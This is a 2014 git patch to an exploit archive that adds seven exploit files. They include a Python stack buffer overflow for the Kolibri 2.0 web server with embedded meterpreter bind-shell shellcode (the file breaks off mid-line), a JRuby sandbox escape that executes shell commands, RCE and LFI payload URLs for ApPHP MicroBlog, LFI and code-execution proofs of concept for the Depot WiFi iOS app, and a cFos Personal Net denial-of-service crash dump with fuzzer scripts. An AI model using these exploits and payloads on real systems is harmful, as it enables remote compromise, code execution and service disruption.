From a6e2fc14616cb8436bfb44307266e111b3f95176 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 27 Apr 2014 04:36:25 +0000 Subject: [PATCH] Updated 04_27_2014 --- files.csv | 7 + platforms/ios/webapps/33026.txt | 319 +++++++++++++++++++++++++++++ platforms/linux/dos/33017.txt | 11 + platforms/linux/local/33028.txt | 51 +++++ platforms/php/webapps/33030.txt | 34 +++ platforms/windows/dos/33018.txt | 163 +++++++++++++++ platforms/windows/remote/33024.txt | 7 + platforms/windows/remote/33027.py | 77 +++++++ 8 files changed, 669 insertions(+) create mode 100755 platforms/ios/webapps/33026.txt create mode 100755 platforms/linux/dos/33017.txt create mode 100755 platforms/linux/local/33028.txt create mode 100755 platforms/php/webapps/33030.txt create mode 100755 platforms/windows/dos/33018.txt create mode 100755 platforms/windows/remote/33024.txt create mode 100755 platforms/windows/remote/33027.py diff --git a/files.csv b/files.csv index 15c43c928..4c3e1489e 100755 --- a/files.csv +++ b/files.csv @@ -29760,8 +29760,15 @@ id,file,description,date,author,platform,type,port 33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0 +33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0 +33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0 33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 +33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0 +33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 +33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 +33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 +33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,"jiko jawad",php,webapps,0 diff --git a/platforms/ios/webapps/33026.txt b/platforms/ios/webapps/33026.txt new file mode 100755 index 000000000..a95e94046 --- /dev/null +++ b/platforms/ios/webapps/33026.txt @@ -0,0 +1,319 @@ +Document Title: +=============== +Depot WiFi v1.0.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1259 + + +Release Date: +============= +2014-04-23 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1259 + + +Common Vulnerability Scoring System: +==================================== +8.6 + + +Product & Service Introduction: +=============================== +With Depot you can archive all kinds of files on your iPhone, iPod or iPad and then share them on a local WiFi network +In Depot not only you can receive files from other applications that supports document interaction (as Mail or Safari), +but you can also download and upload files from any kind of PC and internet enabled devices. You can then open your files +directly on your device or share them between other devices such as smartphones, tablets, PCs, game consoles and smart TVs +connected through a local WiFi. + +(Copy of the Homepage: https://itunes.apple.com/br/app/depot/id858248612 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Depot v1.0.0 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-04-23: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Maurizio Berioli +Product: Depot - iOS Mobile Application 1.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. The local file include +web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise +the mobile web-application. + +The web vulnerability is located in the `filename` value of the `+Files > Upload!` module. Remote attackers are able to inject own files with +malicious `filename` values in the `Upload!` POST method request to compromise the mobile web-application. The local file/path include execution +occurs in the `Depot index item list` context of the wifi interface. Attackers are able to inject own local file requests by usage of the `wifi interface` +path value or by a local privileged device user account via `filename sync` rename. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent script codes to execute different local malicious +attacks or requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security risk of the +local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. + +Exploitation of the local file include web vulnerability requires no privileged application user account or user interaction. Successful exploitation of +the local file include web vulnerability results in mobile application or connected device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] +File > Upload! + +Vulnerable Function(s): + [+] Create a new Folder (remote) + [+] rename (local sync) + +Vulnerable Parameter(s): + [+] filename (path value) + +Affected Module(s): + [+] Depot Index Item Listing (http://localhost/) + + + + +1.2 +A code execution web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. The issue allows an attacker to +compromise the application and connected device components by exploitation of system specific code execution vulnerability in the webdisk interface. + +The vulnerability is located in the GET method request of the `+Folders` module. The main index provides a folders add form which is not secure +encoding the regular inputs. The context can be implemented to the folders form and the results is the application-side execution of system +specific malicious codes in the index. The file itself will not be transfered and the input generates the listing context to the index. + +The input field of the +Folders module executes the wrong encoded input via GET method request by the name value. Remote attackers are able to +execute the own malicious codes by usage of a script code payload in combination with the affected system device values. The execution of the code +occurs in the main depot file dir listing context. The attack vector is on application-side and the request method to attack the service is GET. +The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. + +Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction. +Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise. + + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] +Folders + +Vulnerable Function(s): + [+] Create a new Folder (remote) + [+] rename (local sync) + +Vulnerable Parameter(s): + [+] foldername + +Affected Module(s): + [+] Depot Index Item Listing (http://localhost/) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Exploit Filename Index + +
+Name
Date
+
Size
+ +./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png + 22.04.2014 11:37 538.00bytes + + +--- POC SESSION LOGS [POST] --- +Status: 200[OK] +GET http://localhost:80/?addfile=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2924] Mime Type[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT + +6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer + +[http://localhost:80/] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[2924] + Connection[close] + Cache-Control[no-cache] + + +Status: 200[OK] +POST http://localhost:80/ Load Flags + +[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2920] Mime Type[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/?addfile=1] + Connection[keep-alive] + POST- + +Daten: + POST_DATA[-----------------------------2914547563213 +Content-Disposition: form-data; name="mauber"; filename="./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png" +Content-Type: image/png + + +Reference(s): +http://localhost:80/?addfile= + + + +1.2 +The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC #1: Exploit Index Foldername Item + +
Folders [+]
>"%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C" <="" created!<="" div="">
Name
Date
[.deviceMedia.] - + + [%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C) <] + + +PoC #2: Exploit #2 Directory/Path Value + +<< Browsing:[/][>"<%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C)" <<="" a="">] +
+
+Folders [+]
No sub-folders presents.
Files [ ++]
No files present.
 + + +--- POC SESSION LOGS [GET] --- + +GET http://localhost:80/.createdir?newdir=%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 + +(Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer + +[http://localhost:80/?adddir=1] + Response Header: + + +11:15:44.105[31ms][total 31ms] Status: 200[OK] +GET http://localhost:80/%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[48] Mime Type + +[text/html] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept- + +Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[48] + Connection[close] +Cache-Control[no-cache] + + + +Reference(s): +http://localhost:80/.createdir?newdir= + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability is estimated as high. + +1.2 +The security risk of the code execution web vulnerability is estimated as high(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/dos/33017.txt b/platforms/linux/dos/33017.txt new file mode 100755 index 000000000..c4eb23627 --- /dev/null +++ b/platforms/linux/dos/33017.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/35148/info + +Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +Attackers can exploit this issue to cause the affected application to crash, effectively denying service. Attackers may also be able to execute arbitrary code, but this has not been confirmed. + +Acrobat 9.1.1 is vulnerable; other versions may also be affected. + +NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. + +http://www.exploit-db.com/sploits/33017.pdf \ No newline at end of file diff --git a/platforms/linux/local/33028.txt b/platforms/linux/local/33028.txt new file mode 100755 index 000000000..307eafebe --- /dev/null +++ b/platforms/linux/local/33028.txt @@ -0,0 +1,51 @@ +Phenoelit Advisory + +[ Authors ] + joernchen + + Phenoelit Group (http://www.phenoelit.de) + +[ Affected Products ] + jruby-sandbox <= 0.2.2 + https://github.com/omghax/jruby-sandbox + +[ Vendor communication ] + 2014-04-22 Send vulnerability details to project maintainer + 2014-04-24 Requesting confirmation that details were received + 2014-04-24 Maintainer states he is working on a test case + 2014-04-24 Maintainer releases fixed version + 2014-04-24 Release of this advisory + +[ Description ] + jruby-sandbox aims to allow safe execution of user given Ruby + code within a JRuby [0] runtime. However via import of Java + classes it is possible to circumvent those protections and + execute arbitrary code outside the sandboxed environment. + +[ Example ] + +require 'sandbox' +sand = Sandbox.safe +sand.activate! + +begin + sand.eval("print `id`") +rescue Exception => e + puts "fail via Ruby ;)" +end +puts "Now for some Java" + +sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'") +sand.eval("Kernel.send :java_import, 'java.util.Scanner'") +sand.eval("s = Java::java.util.Scanner.new( " + + "Java::java.lang.ProcessBuilder.new('sh','-c','id')" + + ".start.getInputStream ).useDelimiter(\"\x00\").next") +sand.eval("print s") + +[ Solution ] + Upgrade to version 0.2.3 + +[ References ] + [0] http://jruby.org/ + +[ end of file ] \ No newline at end of file diff --git a/platforms/php/webapps/33030.txt b/platforms/php/webapps/33030.txt new file mode 100755 index 000000000..91e34f7bb --- /dev/null +++ b/platforms/php/webapps/33030.txt @@ -0,0 +1,34 @@ +----------[exploit Debut] +[Multiple Vulnerability] +----------[Script Info] + +Moi : JIKO +Site : No-exploit.Com + + +----------[Script Info] + +Site : http://www.apphp.com +Download : http://www.apphp.com/downloads_free/php_microblog_101.zip + +----------[exploit Info] + +~[RCE] +http://path/index.php?jiko);system((dir)=/ +~[LFI] +http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter) +http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter) + +if (($page != "") && file_exists("page/" . $page . ".php")) { + include_once("page/" . $page . + +".php"); + } else if (($admin != "") && + +file_exists("admin/" . $admin . ".php")) { + include_once("admin/" . $admin + +. ".php"); + } +----------[exploit Fin] + \ No newline at end of file diff --git a/platforms/windows/dos/33018.txt b/platforms/windows/dos/33018.txt new file mode 100755 index 000000000..2fbe44259 --- /dev/null +++ b/platforms/windows/dos/33018.txt @@ -0,0 +1,163 @@ +?cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service + + +Vendor: cFos Software GmbH +Product web page: https://www.cfos.de +Affected version: 3.09 + +Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for +personal and professional use. For personal use, instead of hosting websites +with a webhoster, you just run it on your Windows machine. For professional +use, you rent a virtual windows PC or dedicated PC from a webhoster and run +it there. + +Desc: cFos Personal Net web server is vulnerable to a remote denial of service +issue when processing multiple malformed POST requests in less than 3000ms. +The issue occurs when the application fails to handle the data sent in the +POST requests in a single socket connection causing heap memory corruption +which results in a crash of the HTTP service. + +SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0 + +============================================================================ + +(658.1448): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe +eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88 +eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +cfospnet+0x54529: +00914529 ff5004 call dword ptr [eax+4] ds:002b:feeefef2=???????? +0:024> d ecx +02813dcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ddc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813dec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813dfc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e3c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813e4c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e5c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e6c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e7c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e8c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813e9c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813eac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ebc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813ecc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813edc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813eec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813efc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f0c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f1c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f2c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813f3c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.! +0:024> d +02813f4c 8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04 .....q-......q-. +02813f5c 01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48 ...._CFPNET_PATH +02813f6c 00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04 .............A,. +02813f7c 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00 ............)... +02813f8c 2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 /............... +02813f9c 00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04 .....f.8.....1,. +02813fac d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813fbc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d +02813fcc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813fdc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813fec ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +02813ffc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281400c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281401c ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f .............f./ +0281402c c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00 ........n.a.m.e. +0281403c 3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 =............... +0:024> d +0281404c 00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02 .....f."....`... +0281405c 10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe ..+............. +0281406c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281407c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281408c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281409c ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21 .............f.! +028140ac dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02 ........07...K.. +028140bc 00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00 ....REQUEST_URI. +0:024> d +028140cc 0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02 .............A.. +028140dc 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00 ................ +028140ec 1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00 ................ +028140fc 00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72 .....f.-..../scr +0281410c 69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f ipts/get_server_ +0281411c 73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab stats.jss....... +0281412c ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f .............f.? +0281413c d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe .....J,...-..... +0:024> d +0281414c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281415c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281416c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281417c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281418c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0281419c ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +028141ac ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +028141bc ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................ +0:024> d esi +028198b0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198c0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198d0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198e0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +028198f0 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819900 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819910 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ +02819920 0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba ................ + +============================================================================ + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5184 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php + + +01.04.2014 + +--- + + +-ALGjlang + + open_socket(); for(j=1;j<=30;j++) + { + send_socket(" + POST /scripts/get_server_stats.jss?name= HTTP/1.1 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) + Accept: */* + Host: 192.168.0.107 + Content-Length: 20 + + AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a + ") } close_socket(); + + +-SPKfzz + + s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n"); + s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n"); + s_string("Accept: */*"); + s_string("Host: 192.168.0.107\r\n"); + s_string("Content-Length: "); + s_blocksize_string("fuzz",15); + s_string("\r\n\r\n"); + + s_block_start("fuzz"); + s_string("joxypoxyjoxypoxy!!\r\n\" * 100); + s_string_variable("ZSL"); + s_string("\r\n"); //importante + s_block_end("fuzz"); diff --git a/platforms/windows/remote/33024.txt b/platforms/windows/remote/33024.txt new file mode 100755 index 000000000..47eb497aa --- /dev/null +++ b/platforms/windows/remote/33024.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/35200/info + +Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy. + +An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks. + +http://www.exploit-db.com/sploits/33024.zip \ No newline at end of file diff --git a/platforms/windows/remote/33027.py b/platforms/windows/remote/33027.py new file mode 100755 index 000000000..eae5cd697 --- /dev/null +++ b/platforms/windows/remote/33027.py @@ -0,0 +1,77 @@ +#!/usr/bin/python +# Exploit Title: Kolibri GET request Stack buffer Overflow +# Date: 25 April 2014 +# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org +# Vendor Homepage: http://www.senkas.com/kolibri/download.php +# Version: Kolibri 2.0 +# Tested on: Windows XP SP3, Spanish +# Thanks:To my wife for putting up with my possessions +# Description: +# A buffer overflow is triggered when a long GET command is sent to the server. + +import socket, sys, os, time + +if len(sys.argv) != 3: + print "[*] Uso: %s \n" % sys.argv[0] + print "[*] Exploit created by Polunchis" + print "[*] https://www.intrusionlabs.com.mx" + sys.exit(0) +host = sys.argv[1] +port = int(sys.argv[2]) + +#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40' +shellcode = ( +"\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" +"\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86" +"\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe" +"\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23" +"\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23" +"\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6" +"\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab" +"\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab" +"\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55" +"\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2" +"\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8" +"\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37" +"\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63" +"\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6" +"\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb" +"\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c" +"\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08" +"\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec" +"\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2" +"\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc" +"\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0" +"\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f" +) + +nop = "A" * 33 + '\x90' * 20 +junk = "C" *(515-(len(nop)+len(shellcode))) +opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4" +eip = '\x63\x46\x92\x7c' +#7c86467b 7C924663 call esp +buffer = nop + shellcode + junk + eip + opcode + "B" * 60 + +req = ("GET /" + buffer + " HTTP/1.1\r\n" +"Host: " + host + ":" + str(port) + "\r\n" +"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" +"Connection: keep-alive\r\n\r\n") +print " [+] Connecting to %s:%d" % (host, port) +s = 